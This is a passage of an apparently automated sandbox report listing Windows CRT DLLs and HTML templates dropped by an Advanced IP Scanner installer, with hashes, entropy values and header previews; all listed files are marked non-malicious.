                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.97635016555389
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UjcW2hWX7QA0GftpBju0dtTxZlBRAk9l3:yAwyi8or1RAO
                                                                                                                                                                                                  MD5:3B038338C1EB179D8EEE3883CF42BC3E
                                                                                                                                                                                                  SHA1:EA97CF2EE16EF2DF3766A40C6CE33C8BE5F683B2
                                                                                                                                                                                                  SHA-256:C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979
                                                                                                                                                                                                  SHA-512:1A6D8FC065237BF0DBBA18C777958522697B6BC2BE1B16586870A0C06178D65B521F66F522BF5636DF793E4AC8A2A3DE780B3C7062273A11F52A381EE851ECE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......Ts....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22720
                                                                                                                                                                                                  Entropy (8bit):6.8330909328576315
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
                                                                                                                                                                                                  MD5:5245F303E96166B8E625DD0A97E2D66A
                                                                                                                                                                                                  SHA1:1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
                                                                                                                                                                                                  SHA-256:90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
                                                                                                                                                                                                  SHA-512:AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):6.969708578931716
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:sWVghW/cgbXH9YOCAs/nGfe4pBjSf4AKWNArXVWQ4mWvMHqnajMHxxBNT0662ONh:sW2hWUgbCA0GftpBjQGEMHlI663Uh
                                                                                                                                                                                                  MD5:45C54A21261180410091CEFB23F6A5AE
                                                                                                                                                                                                  SHA1:80EEE466D086D30C61EAEFC559D57E5E64F56F61
                                                                                                                                                                                                  SHA-256:2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918
                                                                                                                                                                                                  SHA-512:4962F85C94162FE2E35979FFF4E4B3752F322C61D801419769916F5E3A0E0C406284D95C22709C690212D4572EB688D9311A8F85F17C4F5D1A5A9F00E732808C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@............................."............ ...................<..............8............................................................................text...2........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20672
                                                                                                                                                                                                  Entropy (8bit):6.979229086130751
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kgq6nWm5C1W2hW7SUA0GftpBjAdlI663Um:k6nWm5CTqij66km
                                                                                                                                                                                                  MD5:AB8734C2328A46E7E9583BEFEB7085A2
                                                                                                                                                                                                  SHA1:B4686F07D1217C77EB013153E6FF55B34BE0AF65
                                                                                                                                                                                                  SHA-256:921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8
                                                                                                                                                                                                  SHA-512:FD7E828F842DEABF2DCDCEA3E947DC3AA909C0B6A35C75FD64EDC63C359AB97020876E6C59AD335A2A166437FA65F57433F86C1C2FE10A34B90D15D8592FE911
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.948212808065758
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:579Y17aFBRAWVghW/FgbXH9YOCAs/nGfe4pBjSfyWNArXVWQ4mWuA3qnaj9RlS6b:OtW2hWdgbCA0GftpBjrpA3lBRAkJ
                                                                                                                                                                                                  MD5:39D81596A7308E978D67AD6FDCCDD331
                                                                                                                                                                                                  SHA1:A0B2D43DD1C27D8244D11495E16D9F4F889E34C4
                                                                                                                                                                                                  SHA-256:3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7
                                                                                                                                                                                                  SHA-512:0EF6578DE4E6BA55EDA64691892D114E154D288C419D05D6CFF0EF4240118C20A4CE7F4174EEC1A33397C6CD0135D13798DC91CC97416351775F9ABF60FCAE76
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......4....@.......................................... ...................<..............8............................................................................text...&........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.02455319040347
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
                                                                                                                                                                                                  MD5:E70D8FE9D21841202B4FD1CF55D37AC5
                                                                                                                                                                                                  SHA1:FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
                                                                                                                                                                                                  SHA-256:E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
                                                                                                                                                                                                  SHA-512:BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......./....@.............................e............ ...................<..............8............................................................................text...u........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29376
                                                                                                                                                                                                  Entropy (8bit):6.5989266511221745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
                                                                                                                                                                                                  MD5:D0D380AF839124368A96D6AA82C7C8AE
                                                                                                                                                                                                  SHA1:E2AC42F829085E0E5BEEA29FCFF09E467810A777
                                                                                                                                                                                                  SHA-256:06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
                                                                                                                                                                                                  SHA-512:DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26816
                                                                                                                                                                                                  Entropy (8bit):6.632501498817798
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
                                                                                                                                                                                                  MD5:809BC1010EAF714CD095189AF236CE2F
                                                                                                                                                                                                  SHA1:10DBC383F7C49DE17FC50E830E3CB494CC873DD1
                                                                                                                                                                                                  SHA-256:B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
                                                                                                                                                                                                  SHA-512:F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):73408
                                                                                                                                                                                                  Entropy (8bit):5.811008103709619
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:nt2b2De5c4bFX2Jy2cvxXWpD9d3334BkZnkPgE79g:nw2De5c4bFX2Jy2cvxXWpD9d3334BkZ3
                                                                                                                                                                                                  MD5:1DD5666125B8734E92B1041139FA6C37
                                                                                                                                                                                                  SHA1:22E9566352E77AB15A917B45A86C0DC548431692
                                                                                                                                                                                                  SHA-256:D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3
                                                                                                                                                                                                  SHA-512:420B9184842ECD7969BF75F0D8A62569725624AE413C83EE3B6F26973318B4170287F657F2BE8DD3E7FC71264D69B2203E016D078615AD6E31E65033D5C59654
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................................................................@.............................8................................<..............8............................................................................text...H........................... ..`.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19648
                                                                                                                                                                                                  Entropy (8bit):6.961849079425489
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:pYTRQqjd7NWVghW/RmgbXH9YOCAs/nGfe4pBjSf1wjWNArXVWQ4mW4C0zA7qnajP:2KcW2hW5mgbCA0GftpBjLKlvQyURz8x
                                                                                                                                                                                                  MD5:8F8A47617DFD829A63E3EC4AFF2718D9
                                                                                                                                                                                                  SHA1:1D7DC26BB9C78C4499514FB3529B3478AECF7340
                                                                                                                                                                                                  SHA-256:6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784
                                                                                                                                                                                                  SHA-512:D3B96B1F80C20DE58A4D4179177E1C1C2B460719968FBA42E1BA694D890342AAAB5A8C67E7FFDD126B2FC6D6A7B2408952279D8926B14BF2DF11740483867821
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......\r....@.............................x............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23232
                                                                                                                                                                                                  Entropy (8bit):6.854338104703726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5b7hrKIW2hW6SUA0GftpBjoQt1TlI663UMp:5bNrKcziZzW66kMp
                                                                                                                                                                                                  MD5:AE3FA6BF777B0429B825FB6B028F8A48
                                                                                                                                                                                                  SHA1:B53DBFDB7C8DEAA9A05381F5AC2E596830039838
                                                                                                                                                                                                  SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                                                                                                                                  SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@......@.....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24768
                                                                                                                                                                                                  Entropy (8bit):6.784463110154403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                                                                                                                                  MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                                                                                                                                  SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                                                                                                                                  SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                                                                                                                                  SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......h....@.............................a............0...............$...<..............8............................................................................text...q........................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24768
                                                                                                                                                                                                  Entropy (8bit):6.778007627268145
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
                                                                                                                                                                                                  MD5:5E72659B38A2977984BBC23ED274F007
                                                                                                                                                                                                  SHA1:EA622D608CC942BDB0FAD118C8060B60B2E985C9
                                                                                                                                                                                                  SHA-256:44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
                                                                                                                                                                                                  SHA-512:ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21184
                                                                                                                                                                                                  Entropy (8bit):6.908629649625132
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                                                                                                                                  MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                                                                                                                                  SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                                                                                                                                  SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                                                                                                                                  SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19136
                                                                                                                                                                                                  Entropy (8bit):7.011995208399749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                                                                                                                                  MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                                                                                                                                  SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                                                                                                                                  SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                                                                                                                                  SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_ar_sa.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1800
                                                                                                                                                                                                  Entropy (8bit):4.977566387382036
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
                                                                                                                                                                                                  MD5:C342B5AAD7F710F39DD20641A1B3DF78
                                                                                                                                                                                                  SHA1:7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
                                                                                                                                                                                                  SHA-256:A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
                                                                                                                                                                                                  SHA-512:CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\details_panel_bg_bg.tpl (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                  Entropy (8bit):5.128056579045673
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
                                                                                                                                                                                                  MD5:1C7DAA7B7C3119E37B599739F3372A97
                                                                                                                                                                                                  SHA1:D8E90B30F5D754C8B7623CF6FE3E5D298E620201
                                                                                                                                                                                                  SHA-256:DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
                                                                                                                                                                                                  SHA-512:ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
                                                                                                                                                                                                  Malicious:false
